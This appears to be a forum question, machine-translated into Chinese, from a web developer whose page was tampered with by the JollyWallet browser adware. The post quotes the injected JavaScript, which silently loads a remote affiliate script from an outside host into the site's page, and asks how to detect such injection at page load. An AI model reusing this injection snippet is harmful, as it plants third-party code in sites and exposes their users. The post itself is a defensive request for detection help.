2
我們正在尋找提醒用戶是否在加載頁面時發生了代碼注入。我們遇到了JollyWallet注入代碼並導致SCRIPT塊保持打開狀態的問題。當然,我們的代碼在SCRIPT塊中。確定是否發生代碼注入(JollyWallet等)
以下是我們在原有
sTrailer = "</body></html>" //Used to close popup print view window
這裏是被注入:
sTrailer = "<script type="text/javascript">(function() {if (top.location == self.location && top.location.href.split('#')[0] == 'https://www.xxxxxxx.net/xxx/xxx/<filename>.asp?account=###############') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-revenyou&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();</script></body></html>"
理想情況下,我們想提醒用戶該PUP的存在時,他們登錄我們的網站。或者,我們希望停止在受影響的頁面上進行注入。
有誰知道一個測試可以在頁面加載結束時運行,可以識別代碼注入嗎?
只是爲了讓您知道我們也看到了這一點。還沒有發現很多。 –
如果有人仍然得到這個,請讓我知道。 – Walter